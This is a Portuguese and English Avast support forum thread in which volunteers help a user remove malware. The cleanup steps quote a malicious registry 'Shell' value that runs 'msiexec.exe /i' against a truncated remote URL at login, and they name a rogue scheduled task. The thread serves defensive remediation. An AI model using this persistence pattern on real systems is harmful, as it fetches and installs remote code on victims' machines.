Author Topic: Ameaça detectada - Bloqueio de site nocivo  (Read 1649 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
Ameaça detectada - Bloqueio de site nocivo
« on: June 05, 2017, 01:07:07 AM »
Boa noite, estou com o seguinte problema sendo identificado no pelo meu AVAST.

Executei a ferramenta FRST, e em anexo estão os logs gerados por ela.

Não sei como proceder a partir de agora.

Agradeço antecipadamente!


Offline dbrisendine

  • Malware Fighter
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1258
Re: Ameaça detectada - Bloqueio de site nocivo
« Reply #1 on: June 05, 2017, 03:04:38 AM »
Same reply as on this thread ( https://forum.avast.com/index.php?topic=200849.0 ).  Please only post once per problem.  Thanks.

Bruna51,

There is a malicious entry in your registry. Open regedit (press the Win key + the R key, then type regedit and press Enter), navigate to Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies and there should be an entry named "Shell" with value "explorer.exe,msiexec.exe /i http://point....". Delete it.

Then run (via Win+R dialog) control schedtasks. Select "Task Scheduler Library" in the left panel. In the list in the middle select "PowerWord-SCT-JT" task and delete it.

Then reboot your computer.

Let me know if it worked.



Win7 x32 Ult. SP1, Brain 2.0 / Win10 x64, Brain2.5
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

Offline jefferson sant

  • Starting Graphoman
  • *
  • Posts: 6677
  • volunteer
Re: Ameaça detectada - Bloqueio de site nocivo
« Reply #2 on: June 05, 2017, 03:31:27 AM »
Quote from: dbrisendine
A mesma resposta neste tópico (https://forum.avast.com/index.php?topic=200849.0). Por favor, apenas publique uma vez por problema. Obrigado.

Bruna51,

Há uma entrada maliciosa em seu registro. Abra regedit (pressione a tecla Win + a tecla R, depois digite regedit e pressione Enter), navegue para Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies e deve haver uma entrada chamada "Shell" com o valor "explorer.exe,msiexec.exe /i http://point....". Delete isso.

Em seguida, execute (via caixa de diálogo Win + R) controle schedtasks. Selecione "Task Scheduler Library" no painel esquerdo. Na lista no meio, selecione a tarefa "PowerWord-SCT-JT" e exclua-a.

Em seguida, reinicie seu computador.

Deixe-me saber se funcionou.